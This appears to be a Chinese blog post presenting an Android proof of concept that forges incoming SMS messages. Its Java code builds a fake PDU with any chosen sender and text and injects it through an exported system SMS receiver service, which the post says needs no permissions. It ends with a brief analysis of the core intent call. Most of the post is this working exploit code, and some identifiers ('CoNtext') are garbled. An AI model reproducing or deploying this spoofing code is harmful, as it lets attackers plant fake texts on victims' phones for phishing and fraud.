0x01 這個有是大名鼎鼎的蔣教授發現的,原理簡單,有點意思




0x02 代碼實現



package com.smstrick;

 

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;

 

import android.app.Activity;
import android.content.CoNtext;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;

 

public class SMSTrickActivity extends Activity implements OnClickListener{
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);

 

View continue_button = this.findViewById(R.id.button1);

 

continue_button.setOnClickListener((OnClickListener) this);
}
public void onClick(View v) {
EditText eNum;
EditText eMsg;
String sNum;
String sMsg;

 

eNum = (EditText)findViewById(R.id.editText1);
eMsg = (EditText)findViewById(R.id.editText2);

 

sNum = eNum.getText().toString();
sMsg = eMsg.getText().toString();




//sNum cannot be blank
if(sNum.equals("")) sNum = "123456";

 

createFakeSms(this.getApplicationCoNtext(),sNum,sMsg);

 

}

 

private static void createFakeSms(CoNtext coNtext, String sender, String body) {
//Source: HTTP://stackoverflow.com/a/12338541
//Source: HTTP://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
byte[] pdu = null;
byte[] scBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD("0000000000");
byte[] senderBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD(sender);
int lsmcs = scBytes.length;
byte[] dateBytes = new byte[7];
Calendar calendar = new GregorianCalendar();
dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
.get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
try {
Log.d("ice", "test one");
ByteArrayOutputStream bo = new ByteArrayOutputStream();
bo.write(lsmcs);
bo.write(scBytes);
bo.write(0x04);
bo.write((byte) sender.length());
bo.write(senderBytes);
bo.write(0x00);
bo.write(0x00); // encoding: 0 for default 7bit
bo.write(dateBytes);
try {

 

String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
"stringToGsm7BitPacked", new Class[] { String.class });
stringToGsm7BitPacked.setAccessible(true);
byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,
body);
bo.write(bodybytes);
} catch (Exception e) {
e.printStackTrace();
}

 

pdu = bo.toByteArray();
} catch (IOException e) {
e.printStackTrace();
}

 

Intent intent = new Intent();
intent.setClassName("com.android.mms",
"com.android.mms.transaction.SmsReceiverService");
intent.setAction("android.provider.Telephony.SMS_RECEIVED");
intent.putExtra("pdus", new Object[] { pdu });
//intent.putExtra("format", "3gpp");
coNtext.startService(intent);
}

 

private static byte reverseByte(byte b) {
return (byte) ((b & 0xF0) >> 4 | (b & 0x0F) << 4);
}
}




0x03 實質分析 核心在於自定義了系統的






Intent intent = new Intent();

 

intent.setClassName("com.android.mms",

 

"com.android.mms.transaction.SmsReceiverService");

 

intent.setAction("android.provider.Telephony.SMS_RECEIVED");

 

intent.putExtra("pdus", new Object[] { pdu });

 

//intent.putExtra("format", "3gpp");

 

coNtext.startService(intent);




收到短信的intent,從而偽造了短信,而且不需要任何的權限。
arrow
arrow
    全站熱搜

    戮克 發表在 痞客邦 留言(0) 人氣()